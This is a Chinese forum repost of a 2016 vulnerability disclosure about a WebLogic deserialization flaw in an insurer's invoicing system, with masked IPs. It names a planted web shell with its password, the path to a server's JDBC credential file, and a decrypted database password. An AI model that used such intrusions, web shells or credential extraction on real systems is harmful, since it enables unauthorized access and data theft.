HanDs
NO.2

[7月漏洞公开] 亚太财险保险有限公司某系统存在反序列漏洞(已Getshell+涉及大量敏感信息) 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

已被Getshell,泄漏大量敏感信息。

详细说明:

code 区域
**.**.**.**:9004/casserver/login?service=http%3A%2F%2F**.**.**.**%3A9002%2Fj_acegi_security_check



可以发现是亚太财险保险有限公司的,其中某个端口是开发票的,存在漏洞

code 区域
**.**.**.**:8002/KPServer



而且从后面的数据库信息可以找到是亚太的。

存在weblogic反序列漏洞,已Getshell

code 区域
**.**.**.**:8002/bea_wls_internal/wooyun.jsp?o=index
密码:wooyun123



可以找到数据库,连接数据库。

code 区域
/opt/bea10.3/user_projects/domains/domain8002/config/jdbc/kpglxtdb-jdbc.xml

<name>kpglxtdb</name>
<jdbc-driver-params>
<url>jdbc:oracle:thin:@(DESCRIPTION =(ADDRESS = (PROTOCOL = TCP)(HOST = **.**.**.**)(PORT = 1521))
(ADDRESS = (PROTOCOL = TCP)(HOST = **.**.**.**)(PORT = 1521))(LOAD_BALANCE = yes)(CONNECT_DATA =
(SERVER = DEDICATED)(SERVICE_NAME = zjdb)(FAILOVER_MODE =(TYPE = SELECT)(METHOD = BASIC))))</url>
<driver-name>oracle.jdbc.OracleDriver</driver-name>
<properties>
<property>
<name>user</name>
<value>hx_kpxt</value>
</property>
</properties>
<password-encrypted>{AES}cpGx0Kn+j/K9+/Vcwwh3ZPiD7I/DdykK8D0d0pMJKMw=</password-encrypted>
</jdbc-driver-params>


解密可得到密码为:hx_kpxt



1.jpg



2.jpg



3.jpg



4.jpg



5.jpg



6.jpg



7.jpg





其余的就不一一列出来了!~~~~

漏洞证明:

如上

修复方案:

升级补丁


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
亚太
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组